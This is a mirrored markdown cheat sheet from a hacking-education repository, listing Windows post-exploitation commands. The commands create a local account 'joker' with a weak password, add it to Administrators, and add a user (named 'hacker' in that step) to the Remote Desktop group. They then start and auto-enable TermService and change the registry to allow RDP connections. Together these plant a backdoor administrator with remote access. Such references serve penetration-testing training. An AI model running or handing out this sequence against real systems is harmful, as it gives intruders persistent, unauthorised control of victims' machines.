mirror of
https://github.com/The-Art-of-Hacking/h4cker
synced 2024-11-26 04:40:18 +00:00
38 lines
818 B
Markdown
38 lines
818 B
Markdown
|
# Misc Windows Post Exploitation Tasks
|
||
|
|
||
|
### Adding a Windows User (joker):
|
||
|
```
|
||
|
net user /add joker password123
|
||
|
```
|
||
|
|
||
|
### Adding a user to the Administrators groups
|
||
|
```
|
||
|
net localgroup administrators /add joker
|
||
|
```
|
||
|
|
||
|
### Adding a user to the Remote Desktop user group
|
||
|
```
|
||
|
net localgroup "Remote Desktop users" hacker /add
|
||
|
```
|
||
|
|
||
|
### Starting the Remote Desktop service
|
||
|
```
|
||
|
net start TermService
|
||
|
```
|
||
|
|
||
|
### Verifying if the Remote Desktop Service is active and running
|
||
|
```
|
||
|
tasklist /svc | findstr /C:TermService
|
||
|
```
|
||
|
|
||
|
### Permanently enable Terminal Services
|
||
|
```
|
||
|
sc config TermService start=auto
|
||
|
```
|
||
|
|
||
|
### Enabling Terminal services via the registry
|
||
|
Note: You need to reboot after invoking this...
|
||
|
```
|
||
|
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
|
||
|
```
|